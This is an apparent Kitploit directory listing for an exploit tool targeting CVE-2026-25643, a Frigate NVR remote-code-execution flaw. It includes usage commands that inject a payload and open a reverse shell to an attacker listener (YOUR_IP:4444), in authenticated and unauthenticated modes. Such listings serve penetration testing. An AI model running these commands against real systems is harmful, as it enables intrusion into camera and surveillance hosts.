Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-25643-Frigate-RCE — Exploit for Frigate NVR authenticated RCE via go2rtc exec: protocol injection, automating system command execution and reverse shell capture. | Kitploit
Tools/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Exploit for Frigate NVR authenticated RCE via go2rtc exec: protocol injection, automating system command execution and reverse shell capture.

View Repository
337 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-25643: Frigate NVR <= 0.16.3 Authenticated RCE

Exploit Title: Frigate NVR <= 0.16.3 - Authenticated Remote Code Execution
Date: 2026-02-05
Exploit Author: jduardo2704
Vendor Homepage: https://frigate.video/
Software Link: https://github.com/blakeblackshear/frigate
Version: <= 0.16.3
CVE: CVE-2026-25643 Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Description

Frigate versions up to 0.16.3 are vulnerable to Remote Code Execution (RCE) via the go2rtc configuration. An attacker with authenticated access (or unauthenticated if the instance is exposed) can inject system commands into the stream configuration using the exec: protocol. This exploit automates the payload injection, restarts the service, and catches the reverse shell.

Installation

root@kitploit:~
pip install requests pyyaml

Usage

Authenticated Mode:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

Unauthenticated Mode (if exposed):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

Disclaimer

This script is for educational purposes and authorized security testing only.

Download Tool